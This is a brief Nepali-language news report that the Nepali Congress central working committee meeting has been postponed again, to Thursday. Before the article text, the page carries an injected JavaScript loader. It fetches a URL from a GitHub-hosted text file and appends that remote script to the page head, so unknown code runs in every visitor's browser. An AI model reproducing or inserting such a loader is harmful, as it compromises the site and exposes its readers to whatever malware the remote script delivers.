;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
कात्तिक २३,
काठमाडौं । नेपाली कांग्रेसको भोली (सोमबार) को लागि डाकिएको केन्द्रीय कार्यासमितिको बैठक पुनः सरेको छ । बैठक भोली दिनको १ बजे पार्टीको केन्द्रीय कार्यालयमा बस्ने भनिएकोमा आइतबार प्रेस विज्ञप्ति जारी गरी बैठक सरेक जनाईएको छ ।
यसअघि पनि बैठक सरेको थियो । सोमबारका लागि डाकिएको उक्त बैठक आउदो २७ गते बिहीबार दिउसो १ बजे बस्ने पार्टीका मुख्य सचिव कृष्णप्रसाद पौडेलले जनाकारी दिए । बैठक के कारणले सारिएको भन्ने खुलाईएको छैन् ।
फेसबुक प्रतिक्रियाहरु